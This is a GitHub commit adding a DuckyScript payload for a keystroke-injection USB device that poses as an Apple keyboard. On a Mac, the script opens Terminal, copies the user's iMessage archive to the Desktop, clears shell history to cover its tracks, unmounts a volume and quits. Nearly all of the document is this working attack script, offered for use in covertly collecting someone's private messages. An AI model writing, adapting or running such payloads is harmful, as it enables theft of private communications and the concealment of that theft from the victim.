WIll not work if messages are not archived!!

Need a workaround but for now its okay.
This commit is contained in:
Narsty
2023-05-09 20:42:32 -05:00
committed by GitHub
parent f3b2813eee
commit d3682ad058
+31
View File
@@ -0,0 +1,31 @@
REM Author: NARSTY
REM If you haven't previously archived your iMessages, the folder will be empty.
REM This script captures iMessages and puts it into
REM a folder on the desktop named automatically to the users Name
REM MacOS
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 150
STRING Terminal
DELAY 900
ENTER
DELAY 900
STRING cp -r ~/Library/Messages/Archive /Users/$(whoami)/Desktop/
ENTER
STRING history -c
ENTER
STRING diskutil umount /Volumes/Desktop
ENTER
DELAY 500
STRING history -c
ENTER
STRING echo 5A13X99
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 250
GUI q